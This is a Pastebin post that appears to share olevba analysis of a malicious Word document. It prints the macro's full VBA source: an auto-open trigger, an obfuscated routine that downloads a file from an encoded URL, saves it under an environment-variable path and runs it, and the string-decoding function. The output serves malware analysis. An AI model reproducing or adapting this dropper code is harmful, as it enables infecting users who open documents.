SHARE
TWEET

Malicious Word macro

dynamoo Apr 2nd, 2015 284 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS--B- 07623989.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 07623989.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: 07623989.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
  16. S6Wrk7025w4
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO dfsdfsdf.bas
  27. in file: 07623989.doc - OLE stream: u'Macros/VBA/dfsdfsdf'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29.  
  30. Sub LZHGWIJZGNT()
  31.      MQtf7O h08Nt7g80a0OJNSxSH__54e("Ò¿¾ÊŠ‚z ƒxŽ‡ƒ¡y{ƒšƒz‰²Í|Ѿƒ‰»´¹Ý»xÄÀº", "jKJZPSKi"), Environ(h08Nt7g80a0OJNSxSH__54e("¡¶¼§", "MqoWLfWN")) & h08Nt7g80a0OJNSxSH__54e("½Þ¸º»¬Î×Ѻ‚­ÀÍ", "akTTHHhq")
  32. End Sub
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34. ANALYSIS:
  35. +------------+----------------+-----------------------------------------+
  36. | Type       | Keyword        | Description                             |
  37. +------------+----------------+-----------------------------------------+
  38. | Suspicious | Environ        | May read system environment variables   |
  39. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  40. |            |                | may be used to obfuscate strings        |
  41. |            |                | (option --decode to see all)            |
  42. +------------+----------------+-----------------------------------------+
  43. -------------------------------------------------------------------------------
  44. VBA MACRO sdfsdfggg.bas
  45. in file: 07623989.doc - OLE stream: u'Macros/VBA/sdfsdfggg'
  46. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  47. Function MQtf7O(ByVal ãÏÐÃìðâûàï As String, ByVal øÐÃèâûàûâàï As String) As Boolean
  48.      Dim øÏíãìûâãàÀ As Object, äØÙÐãîøâûàà As Long, ùÈÎÐâûàààà As Long, ðãÏÈÃÈÐâààà() As Byte
  49.  
  50.     Set øÏíãìûâãàÀ = CreateObject(h08Nt7g80a0OJNSxSH__54e("¦¨œž¼£€¹¢™ÄÅ¢", "YUDQpqRa"))
  51.     øÏíãìûâãàÀ.Open h08Nt7g80a0OJNSxSH__54e("´”½", "mOiNlEdE"), ãÏÐÃìðâûàï, False
  52.     øÏíãìûâãàÀ.Send h08Nt7g80a0OJNSxSH__54e("…", "PJbKhRbh")
  53.  
  54.     ðãÏÈÃÈÐâààà = øÏíãìûâãàÀ.responseBody
  55.  
  56.     ùÈÎÐâûàààà = FreeFile
  57.     Open øÐÃèâûàûâàï For Binary As #ùÈÎÐâûàààà
  58.     Put #ùÈÎÐâûàààà, , ðãÏÈÃÈÐâààà
  59.     Close #ùÈÎÐâûàààà
  60.    
  61.     Dim îðÈÃãèðââà
  62. Set îðÈÃãèðââà = CreateObject(h08Nt7g80a0OJNSxSH__54e("·Ø¬ÂÏ“¯¼à³¿ÆÆâÍßµ", "dpGVcenL"))
  63. îðÈÃãèðââà.Open Environ(h08Nt7g80a0OJNSxSH__54e("›¯¹£", "GjlSYrAo")) & h08Nt7g80a0OJNSxSH__54e("±‡†ƒ‰{‡†…ƒŠt²Í¶", "UQQPUFMT")
  64.  
  65.      
  66.  
  67. End Function
  68. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  69. ANALYSIS:
  70. +------------+----------------+-----------------------------------------+
  71. | Type       | Keyword        | Description                             |
  72. +------------+----------------+-----------------------------------------+
  73. | Suspicious | CreateObject   | May create an OLE object                |
  74. | Suspicious | Open           | May open a file                         |
  75. | Suspicious | Environ        | May read system environment variables   |
  76. | Suspicious | Put            | May write to a file (if combined with   |
  77. |            |                | Open)                                   |
  78. | Suspicious | Binary         | May read or write a binary file (if     |
  79. |            |                | combined with Open)                     |
  80. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  81. |            |                | may be used to obfuscate strings        |
  82. |            |                | (option --decode to see all)            |
  83. +------------+----------------+-----------------------------------------+
  84. -------------------------------------------------------------------------------
  85. VBA MACRO Module1.bas
  86. in file: 07623989.doc - OLE stream: u'Macros/VBA/Module1'
  87. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  88.  
  89.  
  90. Public Function h08Nt7g80a0OJNSxSH__54e(ByVal lvFUAJ4O4Ww As String, ByVal HQ07 As String)
  91. Dim D1WW3_661OJL03d46MkaCZS() As Byte
  92. Dim AF8S1() As Byte
  93. Dim iKuNclvIQNbaO15, jbUlyOYaUaoVg84 As Integer
  94. jbUlyOYaUaoVg84 = 3444
  95. For iKuNclvIQNbaO15 = 0 To 97
  96. jbUlyOYaUaoVg84 = jbUlyOYaUaoVg84 + iKuNclvIQNbaO15
  97. DoEvents
  98. Next iKuNclvIQNbaO15
  99.  
  100.  
  101. D1WW3_661OJL03d46MkaCZS = StrConv(lvFUAJ4O4Ww, vbFromUnicode)
  102. AF8S1 = StrConv(HQ07, vbFromUnicode)
  103. For i = 0 To UBound(D1WW3_661OJL03d46MkaCZS)
  104. If i <= UBound(AF8S1) Then
  105. D1WW3_661OJL03d46MkaCZS(i) = D1WW3_661OJL03d46MkaCZS(i) - AF8S1(i)
  106. Else
  107. D1WW3_661OJL03d46MkaCZS(i) = D1WW3_661OJL03d46MkaCZS(i) - AF8S1(i Mod UBound(AF8S1))
  108. End If
  109. Next i
  110. h08Nt7g80a0OJNSxSH__54e = StrConv(D1WW3_661OJL03d46MkaCZS, vbUnicode)
  111. End Function
  112. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  113. ANALYSIS:
  114. No suspicious keyword or IOC found.
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top